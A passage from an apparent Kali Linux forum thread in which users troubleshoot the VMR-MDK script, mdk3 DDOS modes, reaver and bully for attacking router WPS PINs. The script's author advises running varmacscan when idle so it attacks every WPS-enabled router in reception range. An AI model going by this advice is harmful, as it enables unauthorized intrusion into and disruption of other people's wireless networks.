    Make sure you are using VMR-MDK-K2-2016R-011x9.sh not older versions

    This program only works with a small number of routers. Read the help files and run the tests suggested. If the router shows the vulnerability then continue. If not try a different approach.

    Suggest you run varmacscan constantly when the computer is idle.

    MTeams
    I am running kali 2016.1 on a hard drive install and I'm using VMR-MDK-K2-2016R-011x9. I wish I could get far enough to use VMR-MDK-K2-2016R-011x9.sh but I can't even get /root/mdk3-v6/mdk3 to work. It keeps giving me the following error no matter what I try:

    bash: /usr/local/sbin/mdk3: No such file or directory

    Even though I'm looking right at it when I run a dir command...very strange.

  42. #142
    Join Date
    2016-Sep
    Posts
    3
    Quote Originally Posted by mmusket33 View Post
    You should not try and run this program from a live usb. Either use a hard drive install or a persistent usb. Do not try and run a usb with luks encryption

    Make sure you are using VMR-MDK-K2-2016R-011x9.sh not older versions

    This program only works with a small number of routers. Read the help files and run the tests suggested. If the router shows the vulnerability then continue. If not try a different approach.

    Suggest you run varmacscan constantly when the computer is idle.

    MTeams
    Nevermind, I found out what was wrong...you need to be running the 32-bit version of Kali. 64-bit version of Kali returns the no file error even though it means it doesn't have the library to run 32-bit programs such as your mdk3. Thanks so much for your quick reply!

  43. #143
    If I had only saw this thread 5 mins ago I wouldn't have just wiped my whole VM machine and started over. Thank you for pointing this out, I was at a complete loss for where mdk3 went.

  44. #144
    Join Date
    2013-Jul
    Posts
    844
    Reference the modified mdk3 program that comes in the VMR-MDK download package. This mdk3 version does not replace any installed mdk3 program. The modified version is installed in root and the program only accesses the modified mdk3 in root if you select a DDOS process that calls for invalid essid. Hence if you cannot install the modified mdk3 program VMR-MDK will run fine. All that will occur is if you select an invalid ESSID DDOS process in the config file the Xterm window will not run the process. Just change the DDOS process in the config file to any other process thru leafpad or another text editor and continue.

    Musket Teams
    Last edited by mmusket33; 2016-09-07 at 11:51.

  45. #145
    Join Date
    2016-Sep
    Posts
    28
    hi friends.
    no config files?
    Last edited by 1stcowgirl; 2016-09-10 at 06:19.

  46. #146
    I was wondering if anyone has run into this issue.

    I can only run it through one cycle and then it dies and spits out this line:

    usage: VMR-MDK-K2-2016R-011x9.sh <start|stop|check> <interface> [channel or frequency]

    Eveyrthing else runs smoothly just trying to get ti to continue running ha proven to be an issue.

    I have chmod 'ed to 755
    also manually killed _supplicant & network-manager

    Any ideas?

    Thanks again for writing this!

  47. #147
    Join Date
    2013-Jul
    Posts
    844
    MTeams saw this occur when during program construction. We had to slow the routines down so all commands between the wifi device and the computer could be completed successfully.

    Are you using luks encryption or a usb cable connection to your wifi device longer then 5 meters? You are loosing your connection to your wifi device. When the program tried to spoof the mac addresses etc it cannot start your device.

    Since you state the program runs successfully for one complete cycle then it is probably not in your initial setup. However make sure you select line numbers for you devices when asked do not enter mon0 or wlan0mon etc. This is a common error.

    MTeams

  48. #148
    Join Date
    2016-Sep
    Posts
    6
    If I'm very greatful for the script. Nicely done. But I'm getting the same problem whatever I do. It's keeps repeating the pin 12345670 and on and on. WPS transaction failed (code 0x04). The script is running fine. And I set all the things as they should as the video shows. Injection is working. And I get a handshake. What a I doing wrong. Got the same problem running reaver on it's own without this script. Please can someone help me out?

  49. #149
    Join Date
    2013-Jul
    Posts
    844
    To Pietje

    You probably are doing nothing wrong. The router is simply not responding. You could try bully try using AAnarchy's version the link can be found in these forums. Mteams also suggests when your computer is not in use run varmacscan . Sometimes routers that do not respond to reaver pin requests suddenly begin functioning. Varmacscan will attack all WPS enabled routers within reception range.

    Musket Teams

  50. #150
    Join Date
    2016-Sep
    Posts
    6
    Thanks for answering so quickly I'm going to look into asap.

Similar Threads

  1. How burn dvd/cd using Kali2.0?
    By forkintheroad in forum General Archive
    Replies: 0
    Last Post: 2016-01-19, 07:32
  2. Issues with VPN in Kali2.0
    By Medic in forum TroubleShooting Archive
    Replies: 3
    Last Post: 2015-08-26, 18:19

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •